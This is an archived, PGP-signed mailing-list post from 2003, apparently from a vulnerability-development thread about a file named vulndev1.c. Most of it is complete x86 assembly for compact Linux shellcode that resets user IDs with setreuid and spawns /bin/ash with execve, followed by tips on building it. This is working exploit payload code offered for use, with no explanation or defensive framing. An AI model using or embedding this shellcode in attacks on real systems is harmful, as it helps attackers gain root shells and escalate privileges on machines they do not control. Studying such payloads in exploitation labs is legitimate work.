-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 i havent been really following the thread too much; although i did take a look at the code (vulndev1.c), anyways if someone is having a problem w/ shellcode here is the asm for a generic sys_setreuid/execve shellcode thats on the smaller side. .section .text .global _s _s: xorl %ebx, %ebx xorl %ecx, %ecx movb $0x46, %al # sys_setreuid int $0x80 xorl %eax, %eax pushl %eax pushl $0x6873612f # hsa/ pushl $0x6e69622f # nib/ movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ecx xorl %edx, %edx movb $0xb, %al # sys_execve int $0x80 ah this calls /bin/ash if you dont have it, change the string and make sure to pass the -e flag to ld. its small, it comes out to like 20+b or similar, i cant remember. if i misread a post, well ignore me "Once set in motion, the process of questioning could come to but one end, the erosion of conviction and certitude and collapse into despair" (The Specter of the Absurd, 1988). -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+zkcioEcehqzkkpgRAr4cAKC9sThgCtXl3BP+ckajYpdxSTVtJwCdHPiR 9cRbv8KlM4VdSkJHxkHU1jc= =80gt -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri May 23 2003 - 09:23:18 PDT